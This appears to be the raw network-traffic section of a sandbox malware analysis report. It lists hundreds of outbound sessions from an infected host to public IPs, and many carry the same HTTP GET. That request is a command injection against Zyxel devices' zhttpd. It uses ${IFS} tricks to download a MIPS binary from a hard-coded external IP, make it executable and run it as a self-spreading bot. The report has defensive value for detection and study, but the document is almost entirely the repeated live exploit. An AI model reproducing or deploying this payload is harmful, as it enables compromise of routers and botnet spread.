                                              Jan 29, 2024 07:04:11.431637049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9615192.168.2.144603641.34.241.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.431660891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9616192.168.2.1441516196.4.234.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.431714058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9617192.168.2.1438206199.199.30.37443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.431751966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9618192.168.2.14390964.127.95.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.431772947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9619192.168.2.143422439.36.141.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.431827068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9620192.168.2.1460410208.142.126.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.431869030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9621192.168.2.1447746150.19.129.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.431891918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9622192.168.2.145383078.249.228.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.431929111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9623192.168.2.1457536176.7.179.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.431979895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9624192.168.2.144378642.87.97.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.432024956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9625192.168.2.143976875.232.254.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.432061911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9626192.168.2.1446358134.36.164.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.432100058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9627192.168.2.1458480164.88.81.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.432131052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9628192.168.2.1451926162.147.84.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.432169914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9629192.168.2.144311249.130.160.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.432178974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9630192.168.2.1443154220.27.21.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.432233095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9631192.168.2.144105835.54.217.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.432260990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9632192.168.2.1456902163.91.229.37443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.432295084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9633192.168.2.14335922.200.96.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.432332039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9634192.168.2.146018224.128.144.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.432362080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9635192.168.2.145473448.17.209.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.432405949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9636192.168.2.1449838222.132.178.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.432442904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9637192.168.2.144542092.53.156.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.432497978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9638192.168.2.1445056165.113.17.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.432534933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9639192.168.2.1449322221.77.111.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.432559013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9640192.168.2.1454276128.223.206.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.432600021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9641192.168.2.1434162195.1.228.159443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:11.432650089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9642192.168.2.143764069.94.128.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9643192.168.2.143542446.42.190.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9644192.168.2.1433866175.132.78.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9645192.168.2.1439788104.133.8.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9646192.168.2.1435920101.238.100.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9647192.168.2.143651884.79.209.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9648192.168.2.144687488.54.19.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9649192.168.2.144023424.52.131.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9650192.168.2.1455964178.116.118.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9651192.168.2.1453716202.255.111.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9652192.168.2.144945037.212.229.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9653192.168.2.144523267.54.45.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9654192.168.2.144222264.245.64.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9655192.168.2.1441474107.206.183.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9656192.168.2.1441372152.54.57.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9657192.168.2.1452708211.3.236.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9658192.168.2.145391473.203.180.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9659192.168.2.144060285.179.57.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9660192.168.2.1455718171.44.51.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9661192.168.2.144032878.60.155.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9662192.168.2.1459506143.128.81.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9663192.168.2.145488491.104.185.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9664192.168.2.1432860199.188.208.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9665192.168.2.1455592206.118.251.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9666192.168.2.143411637.2.72.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9667192.168.2.1441050199.77.142.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9668192.168.2.1443524109.47.222.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9669192.168.2.1444762197.197.131.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9670192.168.2.144401618.169.80.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9671192.168.2.144155637.49.230.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9672192.168.2.1457688186.0.83.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9673192.168.2.1451608147.200.108.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9674192.168.2.143490693.26.246.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9675192.168.2.145227868.224.221.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9676192.168.2.145423443.8.0.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9677192.168.2.1446388134.222.240.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9678192.168.2.1452464180.164.143.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9679192.168.2.145065647.159.68.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9680192.168.2.1450298170.107.191.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9681192.168.2.1458748123.99.215.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9682192.168.2.1436862133.165.183.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9683192.168.2.145144665.224.34.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9684192.168.2.145267267.129.129.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9685192.168.2.1451056105.227.77.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9686192.168.2.143970470.158.119.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9687192.168.2.1448844108.34.208.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9688192.168.2.144743666.202.44.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9689192.168.2.144031678.233.76.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9690192.168.2.145061091.120.67.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9691192.168.2.1442632146.138.114.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9692192.168.2.14541309.75.127.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9693192.168.2.1458344216.168.219.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9694192.168.2.145032469.137.8.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9695192.168.2.1438298168.44.105.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9696192.168.2.1442894160.118.255.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9697192.168.2.1438684105.247.28.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9698192.168.2.1447018109.191.120.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9699192.168.2.144392670.202.230.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9700192.168.2.1458940221.114.94.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9701192.168.2.1456674158.91.57.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9702192.168.2.1455954139.76.216.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9703192.168.2.144997625.45.26.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9704192.168.2.1450398205.211.228.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9705192.168.2.1443838182.73.160.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9706192.168.2.1450228111.130.253.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9707192.168.2.145627672.77.209.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9708192.168.2.143389243.226.121.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9709192.168.2.144369059.89.115.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9710192.168.2.1460434178.200.180.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9711192.168.2.1457512112.230.54.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9712192.168.2.143594662.195.203.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9713192.168.2.1437272133.17.80.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9714192.168.2.1450594193.39.100.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9715192.168.2.1435230218.233.185.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9716192.168.2.144858896.221.145.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9717192.168.2.144151084.111.94.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9718192.168.2.145061659.115.206.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9719192.168.2.1446010175.58.149.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9720192.168.2.1444026107.117.247.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9721192.168.2.145816071.12.176.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9722192.168.2.145877884.34.159.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9723192.168.2.1459674149.217.182.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9724192.168.2.1439882201.249.161.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9725192.168.2.145586480.62.13.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9726192.168.2.145786837.97.158.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9727192.168.2.1457612208.151.58.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9728192.168.2.145692264.57.233.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9729192.168.2.143943667.105.150.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9730192.168.2.1444100130.192.33.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9731192.168.2.145659487.119.101.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9732192.168.2.1446378113.114.75.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9733192.168.2.143317893.186.124.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9734192.168.2.145302459.37.66.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9735192.168.2.144912078.7.32.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9736192.168.2.144375241.252.8.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9737192.168.2.1445992110.206.59.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9738192.168.2.1439996190.100.44.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9739192.168.2.1453860220.226.52.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9740192.168.2.143608687.201.208.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9741192.168.2.144045078.174.17.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9742192.168.2.1459690110.32.72.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9743192.168.2.1435018128.177.76.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9744192.168.2.1439612217.51.17.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9745192.168.2.1458982174.21.126.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9746192.168.2.1438008211.249.214.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9747192.168.2.143483272.171.53.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9748192.168.2.143581019.249.173.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9749192.168.2.1443272163.20.43.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9750192.168.2.1435084106.38.165.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9751192.168.2.1436870129.142.141.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9752192.168.2.1441728162.196.15.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9753192.168.2.1445744167.187.187.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9754192.168.2.144119069.137.1.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9755192.168.2.143957017.240.105.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9756192.168.2.1440440100.132.89.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9757192.168.2.144699096.63.242.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9758192.168.2.1454136176.205.170.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9759192.168.2.1446030151.236.39.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9760192.168.2.145125281.127.100.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9761192.168.2.1437398177.200.219.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9762192.168.2.1455444210.128.142.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9763192.168.2.1436812221.120.68.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9764192.168.2.143894814.126.63.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9765192.168.2.1439734160.110.192.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9766192.168.2.1460422206.111.213.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9767192.168.2.1445766150.164.151.38443
                                              TimestampBytes transferredDirectionData


